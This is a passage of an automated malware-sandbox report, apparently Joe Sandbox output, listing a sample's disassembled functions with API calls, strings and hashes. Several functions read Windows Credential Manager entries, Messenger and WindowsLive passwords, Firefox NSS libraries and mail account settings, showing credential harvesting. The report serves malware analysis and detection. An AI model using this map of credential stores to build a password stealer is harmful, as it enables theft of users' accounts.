                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FromStringUuid$FreeTaskmemcpy
                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                  • API String ID: 1640410171-2022683286
                  • Opcode ID: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                  • Instruction ID: b02d4c6ee9d97a63d35e72255114f680a0148db4ebcc5a4c1265e43ba903851c
                  • Opcode Fuzzy Hash: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                  • Instruction Fuzzy Hash: 8C115B7251012EAACB21EEA4DD40EFB37ECAB48354F050537FD41E3241EA74E9598BA9
                  Function 00404841 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(comctl32.dll,76F90A60,?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404860
                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404886
                  • #17.COMCTL32(?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404894
                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004048B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeLoadMessageProc
                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                  • API String ID: 2780580303-317687271
                  • Opcode ID: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
                  • Instruction ID: fc2202cf77027b42572104eeb985269ec1b891a521d9ed4889cd7b549b4d3d81
                  • Opcode Fuzzy Hash: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
                  • Instruction Fuzzy Hash: E001D6767906527BD7116FA09C4ABAF7EECDB85B4BB008435F602F1180EA78DE02825C
                  Function 0040E507 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleA.KERNEL32(nss3.dll,76F91620,?,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E516
                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E51F
                  • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E528
                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E537
                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E53E
                  • FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E545
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHandleLibraryModule
                  • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                  • API String ID: 662261464-3550686275
                  • Opcode ID: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
                  • Instruction ID: d135409c02d172e6769d1cedb18aaef1940c31153c91c0802dc404148c0ad013
                  • Opcode Fuzzy Hash: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
                  • Instruction Fuzzy Hash: 31E048E6B4133D7689106AF65C44DBBAE5CC885AE63150877AD0473284EEA99D0186F8
                  Function 0040E7E3 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                  Download Yara Rule
                  APIs
                  • strchr.MSVCRT ref: 0040E7FB
                  • strcpy.MSVCRT(?,-00000001), ref: 0040E809
                    • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A13
                    • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A1B
                    • Part of subcall function 00406A01: _memicmp.MSVCRT ref: 00406A39
                  • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E859
                  • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E864
                  • memset.MSVCRT ref: 0040E840
                    • Part of subcall function 0040632F: GetWindowsDirectoryA.KERNEL32(00418550,00000104,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406344
                    • Part of subcall function 0040632F: strcpy.MSVCRT(00000000,00418550,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406354
                  • memset.MSVCRT ref: 0040E888
                  • memcpy.MSVCRT ref: 0040E8A3
                  • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E8AE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                  • String ID: \systemroot
                  • API String ID: 1680921474-1821301763
                  • Opcode ID: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
                  • Instruction ID: 059b6355fafdf26fa7c647f60efba09ddadb95c968e3db809f61c631ea6cdf1b
                  • Opcode Fuzzy Hash: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
                  • Instruction Fuzzy Hash: D321DA725082446DF764B2628D82FEB66EC5B19344F10446FF685E10C1EAFC99D4862A
                  Function 00405BEE Relevance: 15.1, APIs: 10, Instructions: 63windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetClientRect.USER32(?,?), ref: 00405C05
                  • GetWindow.USER32(?,00000005), ref: 00405C1D
                  • GetWindow.USER32(00000000), ref: 00405C20
                    • Part of subcall function 00401601: GetWindowRect.USER32(?,?), ref: 00401610
                    • Part of subcall function 00401601: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040162B
                  • GetWindow.USER32(00000000,00000002), ref: 00405C2C
                  • GetDlgItem.USER32(?,000003ED), ref: 00405C43
                  • GetDlgItem.USER32(?,00000000), ref: 00405C55
                  • GetDlgItem.USER32(?,00000000), ref: 00405C67
                  • GetDlgItem.USER32(?,00000000), ref: 00405C79
                  • GetDlgItem.USER32(?,000003ED), ref: 00405C87
                  • SetFocus.USER32(00000000), ref: 00405C8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ItemWindow$Rect$ClientFocusPoints
                  • String ID:
                  • API String ID: 2187283481-0
                  • Opcode ID: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                  • Instruction ID: 70b7e768433fb03072553d07e5bd29f06e019e0bb4b5ab736e3f65cd75bfe615
                  • Opcode Fuzzy Hash: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                  • Instruction Fuzzy Hash: 09118271500304ABDB216F31CC89E5BBFADEF81715F05883AB444AB1A1CB7DD8018B28
                  Function 00401A0F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$strlen
                  • String ID:
                  • API String ID: 667451143-3916222277
                  • Opcode ID: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                  • Instruction ID: 0a6132ce2dc9cc3df9a7f1a3dcc42749ccde8b25e91b24a7214be5fd0ed86434
                  • Opcode Fuzzy Hash: 7a809be14f52c1f887290bc30d232d0c6e85be01131ef0d930cbf3d7057dc0fb
                  • Instruction Fuzzy Hash: A7619A30409781DFDB209F25848006BBBF1FB89315F909D7FF5D5A22A1E739A846CB0A
                  Function 004077C5 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,76DBEC10), ref: 0040465E
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                  • wcslen.MSVCRT ref: 0040782F
                  • wcsncmp.MSVCRT(?,?,?), ref: 00407873
                  • memset.MSVCRT ref: 00407907
                  • memcpy.MSVCRT ref: 0040792B
                  • wcschr.MSVCRT ref: 0040797F
                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004079A9
                    • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                  • String ID: J$Microsoft_WinInet
                  • API String ID: 2413121283-260894208
                  • Opcode ID: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                  • Instruction ID: 0e9b9eaeb9102773f5efe30ff018f7355b1463afce593653dd7f5536c2c1a2ca
                  • Opcode Fuzzy Hash: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                  • Instruction Fuzzy Hash: 5E51E3B1A083469FD710DF65C880A9BB7E8BF89304F00492EF999D3250E778E955CB97
                  Function 004055A9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 126windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 004055C0
                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055D9
                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055E6
                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055F2
                  • memset.MSVCRT ref: 0040565C
                  • SendMessageA.USER32(?,00001019,?,?), ref: 0040568D
                  • SetFocus.USER32(?), ref: 00405712
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessageSend$FocusItemmemset
                  • String ID: O4A
                  • API String ID: 4281309102-1047957790
                  • Opcode ID: f40dfee95efd54d32f2af3622bff62bd61e387c9aa4c7d82b7cdafa9f0be41ac
                  • Instruction ID: 7cc6a8daf3229b7d8e0d7717536759f0385f0427a9067e31b35bb84d252c6e93
                  • Opcode Fuzzy Hash: f40dfee95efd54d32f2af3622bff62bd61e387c9aa4c7d82b7cdafa9f0be41ac
                  • Instruction Fuzzy Hash: 3D414BB5D00109BFDB209F98DC85DAEBBB9EF04358F00846AE914B7291D7759E50CF94
                  Function 0040DB04 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,76DBEC10), ref: 0040DB33
                  • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040DC08
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • memcpy.MSVCRT ref: 0040DBA4
                  • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040DBB6
                  • RegCloseKey.ADVAPI32(?), ref: 0040DC2A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                  • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                  • API String ID: 3289975857-105384665
                  • Opcode ID: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                  • Instruction ID: 0f5ec9c9176e8b350c57746001926e44edf78976103d06fec131b918f38f0bed
                  • Opcode Fuzzy Hash: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                  • Instruction Fuzzy Hash: 02315871D01219AFCB21DFA1CC44BDEBBB8AF49314F1040B6E505B7290D6789B88DB98
                  Function 00405E50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringlibrarywindowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F6F,?,?), ref: 00405E75
                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F6F,?,?), ref: 00405E93
                  • strlen.MSVCRT ref: 00405EA0
                  • strcpy.MSVCRT(?,?,?,?,00405F6F,?,?), ref: 00405EB0
                  • LocalFree.KERNEL32(?,?,?,00405F6F,?,?), ref: 00405EBA
                  • strcpy.MSVCRT(?,Unknown Error,?,?,00405F6F,?,?), ref: 00405ECA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                  • String ID: Unknown Error$netmsg.dll
                  • API String ID: 3198317522-572158859
                  • Opcode ID: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                  • Instruction ID: ee7e3b4bfe4f381a5a8dca6b6b4a58a66687d49b648cda9812902ba604a22f70
                  • Opcode Fuzzy Hash: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                  • Instruction Fuzzy Hash: DC01D432604214BEEB245B61DC46EDF7E68EB09796B20403AF602B41D0DA759F40DADC
                  Function 0040831F Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                  • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408339
                  • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408349
                  • GetPrivateProfileIntA.KERNEL32(004182C0,rtl,00000000,004181B8), ref: 0040835A
                    • Part of subcall function 00407F2B: GetPrivateProfileStringA.KERNEL32(004182C0,?,0041344F,00418308,?,004181B8), ref: 00407F46
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfilestrcpy$AttributesFileString
                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                  • API String ID: 185930432-2039793938
                  • Opcode ID: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                  • Instruction ID: 927989a77509199662194d441518c64dc34f1856eccff2a3d84bf87df20cc289
                  • Opcode Fuzzy Hash: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                  • Instruction Fuzzy Hash: 00F0C232EC421539C62036615C07FEA3A148BE2F10F08447FBD04B61C2EA7D49D1815E
                  Function 004088C6 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                  • ??2@YAPAXI@Z.MSVCRT ref: 004088FD
                  • ??2@YAPAXI@Z.MSVCRT ref: 00408919
                  • memcpy.MSVCRT ref: 00408941
                  • memcpy.MSVCRT ref: 0040895E
                  • ??2@YAPAXI@Z.MSVCRT ref: 004089E7
                  • ??2@YAPAXI@Z.MSVCRT ref: 004089F1
                  • ??2@YAPAXI@Z.MSVCRT ref: 00408A29
                    • Part of subcall function 00407A69: LoadStringA.USER32(00000000,0000000D,00000FFF,?), ref: 00407B32
                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76F90A60), ref: 00407AE4
                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                  • String ID: d$xA
                  • API String ID: 3781940870-3129348561
                  • Opcode ID: a9e448af71377d593719d1af80ff4ac58293a826cf4ccc803acad48c6db5bab3
                  • Instruction ID: 74bd4705b90376de5a47ec474c9ee228b959cea471a61b54eb6c1cdd4b9bc2c0
                  • Opcode Fuzzy Hash: a9e448af71377d593719d1af80ff4ac58293a826cf4ccc803acad48c6db5bab3
                  • Instruction Fuzzy Hash: 62515C71A01704AFD724DF39C58179ABBE4EF48354F10852EE59ADB381DB74A941CF44
                  Function 00403127 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004030F9: GetPrivateProfileStringA.KERNEL32(00000000,?,0041344F,?,?,?), ref: 0040311D
                  • strchr.MSVCRT ref: 0040323C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfileStringstrchr
                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                  • API String ID: 1348940319-1729847305
                  • Opcode ID: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                  • Instruction ID: 730259ebfdc93430ac8a7640b0a1394381beeb8186f258e339b1e1584fb818e0
                  • Opcode Fuzzy Hash: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                  • Instruction Fuzzy Hash: FF31917150420ABEEF219F60CC06FD97F6CAF10359F10806AF558761D2CBB9AB949B54
                  Function 0040F70E Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpy
                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                  • API String ID: 3510742995-3273207271
                  • Opcode ID: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
                  • Instruction ID: b4a8218c7fa3979214449631b2efcde822773b41d0541f29ded2a506b887ed0e
                  • Opcode Fuzzy Hash: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
                  • Instruction Fuzzy Hash: FF01DFB2EC465025DA7100092C86FE70A494BFAB11FB50137F98533AC4E0AD0CCF829F
                  Function 0040DEC3 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                  • memset.MSVCRT ref: 0040DF75
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040DF8C
                  • _strnicmp.MSVCRT ref: 0040DFA6
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFD2
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFF2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                  • String ID: WindowsLive:name=*$windowslive:name=
                  • API String ID: 945165440-3589380929
                  • Opcode ID: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
                  • Instruction ID: faca0abe0adb4f8b424a3cc142a11908341e250f8e36283e96c9ece6c5c035f0
                  • Opcode Fuzzy Hash: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
                  • Instruction Fuzzy Hash: 14419FB1508345AFC320DF15D8848ABBBECEB84344F00493EF999A2291D734ED48CB66
